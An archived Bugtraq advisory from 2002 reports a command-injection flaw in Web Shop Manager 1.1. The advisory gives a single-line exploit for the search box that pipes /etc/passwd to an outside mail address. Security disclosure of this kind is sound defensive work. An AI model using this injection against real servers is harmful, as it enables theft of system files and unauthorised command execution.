Web Shop Manager Security Vulnerability

From: Tacettin Karadeniz (tacettinkaradeniz@yahoo.com)
Date: 08/15/02

• Previous message: Shane Hird: "Delete arbitrary files using Help and Support Center [MSRC 1198dg]"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

---

Date: Thu, 15 Aug 2002 03:15:37 -0700 (PDT)
From: Tacettin Karadeniz <tacettinkaradeniz@yahoo.com>
To: bugtraq@securityfocus.com

Summary
The Web Shop
Manager(http://www.webscriptworld.com/scripts/wsm.phtml)
allows you to manage a fully functional online store
from a centralized web-based administration system. A
security vulnerability in the product allows executing
of arbitrary commands with the privileges of the
script file used by the product.

Details
Vulnerable systems:
 * Web Shop Manager version 1.1

Exploit:
It is possible to send server's password file any mail
address by writing the following command in Web Shop
Manager's search box:

 |mail user@host.com < /etc/passwd

 

__________________________________________________
Do You Yahoo!?
HotJobs - Search Thousands of New Jobs
http://www.hotjobs.com

---

• Previous message: Shane Hird: "Delete arbitrary files using Help and Support Center [MSRC 1198dg]"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

We are proud to have Web Hosting and Rack Housing from 9 Net Avenue Deutschland.
(11)